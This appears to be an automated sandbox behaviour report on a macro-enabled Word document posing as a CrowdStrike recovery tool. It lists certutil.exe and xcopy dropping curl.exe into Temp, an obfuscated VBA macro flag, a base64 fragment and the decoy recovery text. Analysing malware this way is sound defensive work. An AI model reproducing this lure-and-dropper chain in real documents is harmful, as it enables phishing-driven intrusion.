Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\System32\certutil.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: version.dll
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: atl.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\System32\certutil.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: version.dll
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dll
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: atl.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\System32\certutil.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: version.dll
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: atl.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\System32\certutil.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: version.dll
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: atl.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\System32\certutil.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: version.dll
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dwmapi.dll
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.drLNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0001.tmp.16.drInitial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0001.tmp.16.drInitial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0001.tmp.16.drInitial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0001.tmp.16.drInitial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0000.tmp.16.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.16.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.16.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.16.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.16.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.16.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.16.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\GoogleJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_3236_441263539Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: curl.pdb source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module ThisDocument
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,
Source: curl.exe.4.drStatic PE information: section name: _RDATA
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Local\Temp\curl.exeJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drBinary or memory string: Steps to Recover Hyper-V virtual machines
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drBinary or memory string: Using recovery media on Hyper-V virtual machines
Source: document.xmlBinary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drBinary or memory string: ph3330 The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.
Source: document.xmlBinary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drBinary or memory string: Hyper-V settings
Source: curl.txt.5.drBinary or memory string: jQ0qtQUAjVMci0EIQYVBIHQLSIsBSIlE3CBI/8NIg8EQSIPqAXXiRI1CCEiL00yN
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drBinary or memory string: https://go.microsoft.com/fwlink/?linkid=2280386. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drBinary or memory string: s Hyper-V settings.
Source: document.xmlBinary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xmlBinary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" 